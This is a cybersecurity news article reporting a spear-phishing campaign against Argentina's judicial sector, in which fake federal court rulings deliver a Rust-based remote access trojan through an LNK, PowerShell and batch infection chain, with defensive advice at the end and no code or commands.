A sophisticated new spear-phishing campaign is targeting Argentina’s judicial sector, leveraging authentic-looking federal court rulings to distribute a dangerous Remote Access Trojan (RAT) for remote access. Security researchers have identified this highly targeted attack which employs multi-stage infection techniques to gain persistent access to sensitive legal and institutional data.
The campaign begins with emails containing a ZIP archive that purports to be an official judicial notice. Upon opening the archive, recipients find a weaponized Windows shortcut file disguised as a PDF, a batch script loader, and a seemingly legitimate court resolution document. When a victim clicks on the disguised PDF, the malicious execution chain is triggered, simultaneously displaying a convincing decoy document to avoid immediate suspicion.
Argentine Federal Court Rulings Used in Spear-Phishing Campaign
This tactic of social engineering is particularly effective against legal professionals who routinely handle official court documents. Seqrite analysts identified the campaign and detailed its advanced multi-stage delivery mechanism, noting that the malware specifically targets entities within Argentina’s legal framework, including judicial institutions, legal practitioners, and government bodies associated with the justice system.
The decoy document meticulously mimics authentic Argentine federal court resolutions. It features precise legal Spanish, appropriate case numbering, judicial signatures, and references to actual institutions such as the Tribunal Oral en lo Criminal y Correccional. This level of detail significantly enhances the campaign’s potential success rate among its intended victims.
Infection Mechanism: From Shortcut to RAT Deployment
The attack employs a three-stage infection process designed to evade detection by cybersecurity defenses. The initial weaponized LNK file executes PowerShell in a hidden mode, bypassing standard execution policies. This PowerShell script then runs a batch script that establishes a connection to infrastructure hosted on GitHub.
This script subsequently downloads a second-stage payload, disguised as “msedge_proxy.exe.” To appear legitimate, this file is stored within the Microsoft Edge user data directory. The ultimate payload is a Rust-based Remote Access Trojan equipped with extensive anti-analysis capabilities.
Before execution, the RAT conducts comprehensive environment checks. It scans for virtual machines, sandboxes, and debugging tools. If any analysis tools are detected, the malware terminates itself immediately to avoid investigation. Once operational, it establishes encrypted command-and-control communication. This provides attackers with a range of capabilities, including file exfiltration, the installation of persistence mechanisms, credential harvesting, and the potential deployment of ransomware through modular DLL components.
The discovery of this campaign highlights the ongoing sophistication of cyber threats targeting critical infrastructure and government entities. The use of seemingly official documents and advanced evasion techniques underscores the need for heightened vigilance and robust cybersecurity measures within the judicial sector. Organizations are advised to reinforce employee training on recognizing phishing attempts and to implement advanced threat detection solutions to safeguard their systems against such evolving attacks.